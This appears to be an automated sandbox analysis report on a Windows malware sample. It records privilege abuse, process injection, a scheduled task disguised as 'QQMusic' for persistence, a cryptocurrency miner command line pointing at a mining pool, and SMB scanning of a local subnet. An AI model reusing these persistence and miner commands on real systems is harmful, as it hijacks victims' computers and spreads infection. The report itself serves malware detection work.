N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1624 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3960 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3960 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1368 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1368 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1368 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1624 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1968 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1968 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1968 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1624 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\SMB.exe
PID 1624 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\SMB.exe
PID 1624 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\SMB.exe
PID 1624 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3064 wrote to memory of 2064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3064 wrote to memory of 2064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3064 wrote to memory of 2064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1624 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 2852 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2852 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2852 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1624 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3192 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 3192 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 3192 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1624 wrote to memory of 5736 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 5736 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 5736 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 5776 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 5776 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 5736 wrote to memory of 5836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 5736 wrote to memory of 5836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 5736 wrote to memory of 5836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1624 wrote to memory of 5916 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 5916 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 6028 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 6028 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 6028 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 6068 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 6068 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

"C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe /F

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\ProgramData\SMB.exe

C:\ProgramData\SMB.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 nishabii.xyz udp
CN 218.244.58.70:9011 nishabii.xyz tcp
US 8.8.8.8:53 auto.c3pool.org udp
DE 88.198.117.174:19999 auto.c3pool.org tcp
US 8.8.8.8:53 88.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 174.117.198.88.in-addr.arpa udp
US 8.8.8.8:53 auto.c3pool.org udp
DE 88.198.117.174:19999 auto.c3pool.org tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.77:445 tcp
